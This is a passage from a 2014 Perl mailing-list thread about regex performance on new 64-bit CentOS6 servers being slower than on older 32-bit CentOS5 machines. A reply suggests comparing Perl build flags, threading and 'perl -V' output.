to run in the new environment. Once I started putting in some timing
with Time::HiRes I could see the delay involved large amounts of regexp
processing.

Right now, I'm just looking for any opinions on what I'm seeing so that
I know the architecture is the significant factor in the performance
degradation and then consider any recommendations for improvements. I'm
happy to provide further relevant details.

This sounds like it could be something OS-specific and, googling
CentOS regex performance generates hits, eg,

http://pkgs.org/centos-5/puias-computational-x86_64/boost141-regex-1.4.0-2.el5.x86_64.rpm.html

Newer perl regex engines have added Unicode support which can
add drag. I'd be surprised though if just the 64-bit architecture itself
was totally responsible for major slowdowns. Some of the issues are
mentioned here:

http://stackoverflow.com/questions/17800112/upgraded-from-perl-5-8-32bit-to-5-16-64bit-regex-performance-hit

Per above, some of the items, you'll need to be careful with:

were both Perls compiled with the same flags?
are both perls threaded perls (disabling threading support makes it
faster)
how big are your integers? 64 bit or 32 bit?
what compiler optimizations were chosen?
did your previous Perl have some distribution-specific patches
applied?
Basically, you have to compare the whole perl -V output

--
Charles DeRykus

As you can see, you need to be carefully examining the comparison
scenarios.

--
Charles DeRykus

Re: perl regexp performance - architecture?

2014-02-17 Thread Phil Smith

On Mon, Feb 17, 2014 at 9:10 PM, Charles DeRykus dery...@gmail.com wrote:

On Mon, Feb 17, 2014 at 4:25 PM, Phil Smith philbo...@gmail.com wrote:

On Mon, Feb 17, 2014 at 6:16 PM, Charles DeRykus dery...@gmail.comwrote:

On Mon, Feb 17, 2014 at 12:41 PM, Phil Smith philbo...@gmail.comwrote:

I'm currently loading some new servers with CentOS6 on which perl5.10
is the standard version of perl provided. However, I've also loaded
perl5.18 and I don't think the version of perl is significant in the
results I'm seeing. Basically, I'm seeing perl performance significantly
slower on my new systems than on my 6 year old systems.

Here's some of the relevant details:

+ 6 year old server, 32 bit architecture, CentOS5 perl5.8
perl, and in particular regexp operations, perform reasonably fast.

+ Very new server, 64 bit architecture, CentOS6, perl5.10 (and have
tried perl5.18)
perl, and in particular regexp operations, perform significantly slower
than on the 6 year old server. That struck me as odd right off. I though
surely, perl running on a modern high-end cpu is going to beat out my code
running on 6 year old hardware.

I've compared CPU models at various CPU benchmarking sites and the new
CPUs, as you would expect, are ranked significantly higher in performance
than the old.

I've also installed perl5.8 on the new 64bit servers and the
performance is similar to that of perl5.10 and perl5.18 on the same 64bit
servers. Given that, I don't think perl version plays a significant factor
is the performance diffs.